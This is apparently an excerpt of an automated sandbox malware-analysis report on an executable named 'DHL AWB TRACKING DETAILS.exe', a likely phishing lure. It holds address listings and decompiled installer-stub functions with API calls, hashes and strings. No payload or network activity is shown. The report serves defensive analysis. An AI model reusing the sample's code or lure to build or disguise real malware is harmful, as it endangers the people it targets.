                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x0040621d
                    0x00406220
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c0
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x004063f7
                    0x004063f7
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406199
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x004068d2
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x004068ea
                    0x004068ee
                    0x004068ee
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406107
                    0x00000000
                    0x00406107
                    0x00406193
                    0x0040609c
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00405edf
                    0x00000000
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x00000000
                    0x00000000
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x00000000
                    0x00000000
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x00000000
                    0x00406424
                    0x0040640f
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x00000000
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x00000000
                    0x004066b5
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00000000
                    0x00406828
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x00000000
                    0x0040667d
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                    • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                    • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                    • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                    0x00405d87
                    0x00405d90
                    0x00000000
                    0x00405d9d
                    0x00405d93
                    0x00000000

                    APIs
                    • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405D87
                    • FindClose.KERNEL32(00000000), ref: 00405D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID: $B
                    • API String ID: 2295610775-2366330246
                    • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                    • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                    • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                    • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                    0x00405dab
                    0x00405dae
                    0x00405db5
                    0x00405dbd
                    0x00405dca
                    0x00000000
                    0x00405dd1
                    0x00405dc0
                    0x00405dc8
                    0x00000000
                    0x00000000
                    0x00405dd9

                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: AddressHandleLibraryLoadModuleProc
                    • String ID:
                    • API String ID: 310444273-0
                    • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                    • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                    • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                    • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004035E3 Relevance: 52.7, APIs: 15, Strings: 15, Instructions: 213stringregistrylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 149 4037d3-4037d6 138->149 150 4037db-4037e6 call 403897 138->150 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 153 4036dc-4036e6 GetFileAttributesA 147->153 149->144 161 403864-40386c call 404ef5 150->161 162 4037e8-403805 ShowWindow LoadLibraryA 150->162 156 4036e8-4036ea 153->156 157 4036ec-4036ed call 4055bf 153->157 156->146 156->157 157->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->149 174 40387a-403881 call 40140b 171->174 174->149
                    C-Code - Quality: 96%
                    			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x50f930
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423ed8; // 0x514f2c
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x67
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                    0x004035e9
                    0x004035f2
                    0x004035f9
                    0x004035fb
                    0x0040360f
                    0x00403621
                    0x0040362b
                    0x00403630
                    0x00403636
                    0x00403649
                    0x00403649
                    0x00403654
                    0x004035fd
                    0x00403608
                    0x00403608
                    0x00403659
                    0x0040365e
                    0x00403663
                    0x0040366c
                    0x00403678
                    0x004036ff
                    0x00403707
                    0x00403710
                    0x00403710
                    0x00403726
                    0x0040372c
                    0x0040373a
                    0x004037c9
                    0x004037d1
                    0x004037db
                    0x004037e0
                    0x004037e6
                    0x00403865
                    0x0040386a
                    0x0040386c
                    0x00403888
                    0x00000000
                    0x00403888
                    0x0040386e
                    0x00403874
                    0x0040387c
                    0x0040387c
                    0x00000000
                    0x00403874
                    0x004037f0
                    0x00403801
                    0x00403803
                    0x00403805
                    0x0040380c
                    0x0040380c
                    0x00403814
                    0x0040381c
                    0x0040381e
                    0x00403820
                    0x00403829
                    0x0040382c
                    0x00403832
                    0x00403832
                    0x00403838
                    0x00403851
                    0x0040385b
                    0x00000000
                    0x00403860
                    0x004037d3
                    0x004037d5
                    0x00000000
                    0x00403740
                    0x00403740
                    0x00403746
                    0x00403750
                    0x00403758
                    0x00403762
                    0x00403768
                    0x00403776
                    0x0040388d
                    0x0040388d
                    0x00000000
                    0x0040388d
                    0x0040377c
                    0x00403785
                    0x004037c4
                    0x00000000
                    0x004037c4
                    0x0040367e
                    0x0040367e
                    0x00403683
                    0x00000000
                    0x00000000
                    0x00403688
                    0x0040368d
                    0x0040369d
                    0x004036a2
                    0x004036a9
                    0x00000000
                    0x00000000
                    0x004036ad
                    0x004036af
                    0x004036bc
                    0x004036bc
                    0x004036c4
                    0x004036ca
                    0x004036f2
                    0x004036fa
                    0x00000000
                    0x004036dc
                    0x004036dd
                    0x004036e6
                    0x004036ec
                    0x004036ed
                    0x00000000
                    0x004036ed
                    0x004036e8
                    0x004036ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004036ea
                    0x004036ca

                    APIs
                      • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                    • lstrlenA.KERNEL32(gdsanv,?,?,?,gdsanv,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ), ref: 004036BF
                    • lstrcmpiA.KERNEL32(?,.exe,gdsanv,?,?,?,gdsanv,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                    • GetFileAttributesA.KERNEL32(gdsanv), ref: 004036DD
                    • LoadImageA.USER32 ref: 00403726
                      • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                    • RegisterClassA.USER32 ref: 0040376D
                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                    • CreateWindowExA.USER32 ref: 004037BE
                    • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                    • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                    • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                    • GetClassInfoA.USER32 ref: 0040381C
                    • GetClassInfoA.USER32 ref: 00403829
                    • RegisterClassA.USER32 ref: 00403832
                    • DialogBoxParamA.USER32 ref: 00403851
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $,OQ$.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$gdsanv
                    • API String ID: 914957316-3502106825
